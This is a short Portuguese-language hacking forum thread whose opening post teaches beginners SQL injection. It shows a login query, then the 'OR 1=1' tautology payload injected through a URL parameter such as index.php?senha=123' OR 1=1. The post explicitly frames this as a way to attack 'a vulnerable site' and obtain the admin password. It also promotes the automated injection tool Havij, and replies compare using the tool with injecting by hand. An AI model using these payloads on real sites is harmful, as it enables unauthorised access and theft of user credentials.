O segredo do SQL Injection

O segredo do SQL Injection é só fazer consultas SQL's darem verdadeiro!

Exemplo de uma consulta:

Código:

SELECT * FROM Usuarios WHERE login = 'usuarionovato'

Agora dando resultado verdadeiro:

Código:

SELECT * FROM Usuarios WHERE login = 'usuarionovato' OR 1=1

É obvio que 1 é igual a 1, por isso vai dar true!
Você também pode fazer x=x, 2>1 etc, etc.

Agora como agir num site vulnerável SEM nenhum programa ?

Por exemplo, na URL do site é index.php?senha=123
E a consulta seria:

Código:

SELECT * FROM Usuarios WHERE login = 'usuarionovato' AND senha = '$valor'

Sendo que o valor seria o valor de ?senha=, era só trocar o valor por 123' OR 1=1

A consulta ficaria

Código:

SELECT * FROM Usuarios WHERE login = 'usuarionovato' AND senha = '123' OR 1=1

E obviamente iria ajudar a conseguir a senha do Admin porquê isso lista todas as coisas da tabela.

Queem, n consigue usa isto, pode tbm usa havij, isso fazerei um tuto sobre baixar instalar e usar, pelo tuto gui (y)

Att,
AnonM4K3R

M4K3R escreveu:Queem, n consigue usa isto, pode tbm usa havij, isso fazerei um tuto sobre baixar instalar e usar, pelo tuto gui (y)

Att,
AnonM4K3R

Provavelmente esse Havij faz o trabalho que ensinei no post.

Tem vários outros jeitos SQL Injection, esse é um dos mais usados...

Havij é para os fracos HEHEHEH mas eu ja usei muito, agora que to estudando SQL que to faazendo manualmente =) nois